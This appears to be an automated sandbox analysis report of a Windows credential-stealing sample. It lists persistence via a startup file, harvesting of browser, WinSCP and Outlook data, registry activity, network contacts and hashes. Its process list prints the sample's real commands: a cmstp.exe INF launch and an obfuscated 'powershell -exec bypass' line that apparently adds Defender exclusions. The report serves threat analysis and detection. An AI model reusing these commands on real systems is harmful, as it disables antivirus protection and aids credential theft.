Analysis Overview
SHA256
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b
Threat Level: Shows suspicious behavior
The file 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b was found to show suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks computer location settings
Obfuscated with Agile.Net obfuscator
Drops startup file
Reads user/profile data of web browsers
Reads WinSCP keys stored on the system
Accesses Microsoft Outlook profiles
Drops file in System32 directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Browser Information Discovery
outlook_win_path
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
outlook_office_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 23:55
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 23:55
Reported
2024-11-09 23:57
Platform
win7-20241010-en
Max time kernel
104s
Max time network
109s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Reads WinSCP keys stored on the system
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe
"C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"
\??\c:\windows\system32\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Users\Admin\A.inf
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -exec bypass [char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]80+[char]97+[char]116+[char]104+[char]32+[char]39+[char]67+[char]58+[char]92+[char]39+[char]59+[char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]69+[char]120+[char]116+[char]101+[char]110+[char]115+[char]105+[char]111+[char]110+[char]32+[char]39+[char]101+[char]120+[char]101+[char]39| .((gV '*mdr*').NAMe[3,11,2]-joIn'')
C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | poolfreshstep.com | udp |
| RU | 185.170.144.39:80 | poolfreshstep.com | tcp |
| US | 8.8.8.8:53 | fallback-01-static.com | udp |
| MY | 111.90.145.132:7708 | fallback-01-static.com | tcp |
| MY | 111.90.145.132:7708 | fallback-01-static.com | tcp |
| US | 8.8.8.8:53 | poolfreshstep.com | udp |
Files
memory/2220-0-0x000007FEF5F03000-0x000007FEF5F04000-memory.dmp
memory/2220-1-0x0000000000D00000-0x0000000000D0C000-memory.dmp
memory/2220-2-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-3-0x000000001B0C0000-0x000000001B1A0000-memory.dmp
memory/2220-4-0x000000001C760000-0x000000001CA42000-memory.dmp
C:\Users\Admin\A.inf
| Hash | Value |
|---|---|
| MD5 | 961df7710c27cd2a2452c11aa48ada24 |
| SHA1 | 081694e0067918b8355efef2cf72ef52d82e44b0 |
| SHA256 | d3a48635568ef5d4c0a1c86b3f750f06362056807d39b9461cd053ca88ee7a41 |
| SHA512 | 64f9e3950c01f000e70166c5cb783a0be77249f2c06c99e23a9ab05c6a3a92f18de2478592db3b3dd328c8e5af6abcdcf07c74b63c373b7a24bc336a80503aae |
memory/2220-7-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-8-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-9-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-10-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-11-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-16-0x0000000000540000-0x000000000055C000-memory.dmp
memory/2220-19-0x0000000000360000-0x0000000000368000-memory.dmp
memory/3032-21-0x0000000002490000-0x0000000002498000-memory.dmp
memory/2220-20-0x000007FEF5F03000-0x000007FEF5F04000-memory.dmp
memory/3032-18-0x000000001B290000-0x000000001B572000-memory.dmp
memory/2220-17-0x000000001ABD0000-0x000000001AC18000-memory.dmp
memory/2220-22-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-23-0x000000001B330000-0x000000001B3D6000-memory.dmp
memory/2220-24-0x0000000000CC0000-0x0000000000CF4000-memory.dmp
memory/2220-25-0x000000001AC20000-0x000000001AC6A000-memory.dmp
memory/2220-26-0x0000000000B20000-0x0000000000B36000-memory.dmp
memory/2220-27-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-28-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe
| Hash | Value |
|---|---|
| MD5 | d00a8f6a66f5fcaf18564b6f47831294 |
| SHA1 | d1ae07fd6267b53264f1764cc45aafbfe9f5f763 |
| SHA256 | a60e55b8c66eb98a300d09fbdbe932bdf53476b805f10be02e6a7f2acdee8039 |
| SHA512 | 99937a6e5aeb1248c8c341e43a0747eb98f06f972b559690afa810787173b2eb00ac2b657fd6c82a25630b1a47ab343bbf0b4e7ee250c54e59c95fa7f6f94c27 |
memory/2220-35-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2900-36-0x0000000000B40000-0x0000000000BB0000-memory.dmp
memory/2900-37-0x0000000000BB0000-0x0000000000C4C000-memory.dmp
memory/2900-41-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-39-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-53-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-71-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-38-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-51-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-49-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-55-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-57-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-59-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-61-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-47-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-63-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-66-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-45-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-67-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-69-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-73-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-75-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-43-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-77-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-79-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-81-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-83-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-85-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-87-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-89-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-91-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-93-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-96-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-101-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-99-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-97-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-2892-0x0000000000420000-0x000000000044C000-memory.dmp
memory/2900-2893-0x0000000002450000-0x000000000249C000-memory.dmp
memory/2900-2894-0x0000000004FC0000-0x00000000050B0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 23:55
Reported
2024-11-09 23:57
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
140s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Reads WinSCP keys stored on the system
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
